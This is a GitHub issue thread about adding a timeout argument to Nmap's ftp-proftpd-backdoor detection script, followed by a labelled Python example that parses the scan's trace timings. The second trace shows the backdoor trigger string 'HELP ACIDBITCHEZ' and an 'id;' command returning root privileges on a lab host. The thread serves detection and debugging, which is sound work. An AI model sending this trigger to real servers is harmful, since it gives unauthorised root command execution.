Timeout as parameter in ftp-proftpd-backdoor script #1366

Open
alegrey91 opened this Issue Oct 24, 2018 · 3 comments


alegrey91 commented Oct 24, 2018

Hi,
recently I was trying to use the ftp-proftpd-backdoor script.
I found some problems with detection of the backdoor because of the static timeout set to 5000.
I wrote ~= 3 lines of code to permit the argument passing of the timeout parameter.


dmiller-nmap commented Oct 24, 2018

Did the timeout occur during the connect call or after connecting? You can use --script-trace to see the network operations that the script is attempting. Can you provide some output showing what happened so that we can ensure the most robust fix is applied?

Related pull request #1367.


alegrey91 commented Oct 25, 2018

That's the output:
$ nmap -sV --script ftp-proftpd-backdoor --script-trace -p 21723 192.168.56.101

NSE: TCP 192.168.56.1:50680 > 192.168.56.101:21723 | CONNECT
NSOCK INFO [5.9560s] nsock_read(): Read request from IOD #1 [192.168.56.101:21723] (timeout: 5000ms) EID 18
NSOCK INFO [6.0550s] nsock_trace_handler_callback(): Callback: READ TIMEOUT for EID 18 [192.168.56.101:21723]
NSE: TCP 192.168.56.1:50680 > 192.168.56.101:21723 | CLOSE
NSOCK INFO [6.0560s] nsock_iod_delete(): nsock_iod_delete (IOD #1)
Nmap scan report for 192.168.56.101
Host is up (0.00026s latency).

PORT      STATE SERVICE VERSION
21723/tcp open  ftp     ProFTPD 1.3.3c
Service Info: OS: Unix

That's using my script's review:
$ nmap -sV --script ftp-proftpd-backdoor --script-args timeout=15000 --script-trace -p 21723 192.168.56.101

Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-25 09:00 CEST                                                                     [2/132]
NSOCK INFO [5.9480s] nsock_trace_handler_callback(): Callback: CONNECT SUCCESS for EID 8 [192.168.56.101:21723]                             
NSE: TCP 192.168.56.1:50774 > 192.168.56.101:21723 | CONNECT                                                                                
NSOCK INFO [5.9480s] nsock_read(): Read request from IOD #1 [192.168.56.101:21723] (timeout: 15000ms) EID 18                                
NSOCK INFO [6.1490s] nsock_trace_handler_callback(): Callback: READ SUCCESS for EID 18 [192.168.56.101:21723] (75 bytes): 220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.168.56.101]..
NSE: TCP 192.168.56.1:50774 < 192.168.56.101:21723 | 220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.168.56.101]             

NSE: TCP 192.168.56.1:50774 > 192.168.56.101:21723 | 00000000: 48 45 4c 50 20 41 43 49 44 42 49 54 43 48 45 5a HELP ACIDBITCHEZ            
00000010: 0d 0a

NSOCK INFO [6.1490s] nsock_write(): Write request for 18 bytes to IOD #1 EID 27 [192.168.56.101:21723]                                     
NSOCK INFO [6.1490s] nsock_trace_handler_callback(): Callback: WRITE SUCCESS for EID 27 [192.168.56.101:21723]                             
NSE: TCP 192.168.56.1:50774 > 192.168.56.101:21723 | SEND
NSOCK INFO [6.1490s] nsock_read(): Read request from IOD #1 [192.168.56.101:21723] (timeout: 15000ms) EID 34                                
NSOCK INFO [7.6490s] nsock_trace_handler_callback(): Callback: READ TIMEOUT for EID 34 [192.168.56.101:21723]                              
NSE: TCP 192.168.56.1:50774 > 192.168.56.101:21723 | 00000000: 69 64 3b 0d 0a                                  id;                         

NSOCK INFO [7.6500s] nsock_write(): Write request for 5 bytes to IOD #1 EID 43 [192.168.56.101:21723]                                      
NSOCK INFO [7.6500s] nsock_trace_handler_callback(): Callback: WRITE SUCCESS for EID 43 [192.168.56.101:21723]                             
NSE: TCP 192.168.56.1:50774 > 192.168.56.101:21723 | SEND
NSOCK INFO [7.6500s] nsock_read(): Read request from IOD #1 [192.168.56.101:21723] (timeout: 15000ms) EID 50                                
NSOCK INFO [7.6550s] nsock_trace_handler_callback(): Callback: READ SUCCESS for EID 50 [192.168.56.101:21723] (54 bytes): uid=0(root) gid=0(root) groups=0(root),65534(nogroup).
NSE: TCP 192.168.56.1:50774 < 192.168.56.101:21723 | uid=0(root) gid=0(root) groups=0(root),65534(nogroup)                                 

NSE: TCP 192.168.56.1:50774 > 192.168.56.101:21723 | CLOSE
NSOCK INFO [7.6550s] nsock_iod_delete(): nsock_iod_delete (IOD #1)
Nmap scan report for 192.168.56.101
Host is up (0.00029s latency).

PORT      STATE SERVICE VERSION
21723/tcp open  ftp     ProFTPD 1.3.3c
| ftp-proftpd-backdoor:
|   This installation has been backdoored.
|   Command: id
|_  Results: uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
Service Info: OS: Unix
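
Added example (not from the thread or the Nmap project): this Python script pairs each `nsock_read()` request in a `--script-trace` log with its callback by EID and reports how long the read actually waited against the logged timeout, which is one way to tell whether a read timed out before or after the FTP banner arrived. The function names are illustrative, and the sample lines are taken from the two traces above with payload text trimmed.

```python
import re

# NSOCK lines taken from the two --script-trace runs above (payload text trimmed).
TRACE_DEFAULT = """\
NSOCK INFO [5.9560s] nsock_read(): Read request from IOD #1 [192.168.56.101:21723] (timeout: 5000ms) EID 18
NSOCK INFO [6.0550s] nsock_trace_handler_callback(): Callback: READ TIMEOUT for EID 18 [192.168.56.101:21723]
"""
TRACE_15000 = """\
NSOCK INFO [5.9480s] nsock_read(): Read request from IOD #1 [192.168.56.101:21723] (timeout: 15000ms) EID 18
NSOCK INFO [6.1490s] nsock_trace_handler_callback(): Callback: READ SUCCESS for EID 18 [192.168.56.101:21723] (75 bytes): 220 ProFTPD 1.3.3c Server
NSOCK INFO [6.1490s] nsock_read(): Read request from IOD #1 [192.168.56.101:21723] (timeout: 15000ms) EID 34
NSOCK INFO [7.6490s] nsock_trace_handler_callback(): Callback: READ TIMEOUT for EID 34 [192.168.56.101:21723]
NSOCK INFO [7.6500s] nsock_read(): Read request from IOD #1 [192.168.56.101:21723] (timeout: 15000ms) EID 50
NSOCK INFO [7.6550s] nsock_trace_handler_callback(): Callback: READ SUCCESS for EID 50 [192.168.56.101:21723] (54 bytes): uid=0(root)
"""

REQ = re.compile(r"\[(\d+\.\d+)s\] nsock_read\(\): Read request .*\(timeout: (\d+)ms\) EID (\d+)")
CB = re.compile(r"\[(\d+\.\d+)s\] nsock_trace_handler_callback\(\): Callback: READ (SUCCESS|TIMEOUT) for EID (\d+)")

def read_events(trace):
    """Return (eid, requested_ms, waited_ms, outcome) for every completed read."""
    pending, events = {}, []
    for line in trace.splitlines():
        if m := REQ.search(line):
            pending[m.group(3)] = (float(m.group(1)), int(m.group(2)))
        elif m := CB.search(line):
            started, requested = pending.pop(m.group(3), (None, None))
            if started is None:
                continue  # callback whose request is not in this excerpt
            waited = round((float(m.group(1)) - started) * 1000)
            events.append((int(m.group(3)), requested, waited, m.group(2)))
    return events

def failed_before_banner(trace):
    """True when the first read after connecting timed out, so no probe was sent."""
    events = read_events(trace)
    return bool(events) and events[0][3] == "TIMEOUT"

def short_timeouts(trace):
    """Reads reported as TIMEOUT after waiting less than the logged timeout."""
    return [e for e in read_events(trace) if e[3] == "TIMEOUT" and e[2] < e[1]]

if __name__ == "__main__":
    for name, trace in (("default", TRACE_DEFAULT), ("timeout=15000", TRACE_15000)):
        print(name, "failed before banner:", failed_before_banner(trace))
        for eid, requested, waited, outcome in read_events(trace):
            print(f"  EID {eid}: {outcome} after {waited} ms (logged timeout {requested} ms)")
```

On the first trace this reports one read, EID 18, marked TIMEOUT 99 ms after it was issued with a logged timeout of 5000 ms; on the second, the banner read succeeds after 201 ms and the read following the `HELP` probe is marked TIMEOUT after 1500 ms.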

alegrey91 commented Nov 4, 2018

Do I have to close the issue?
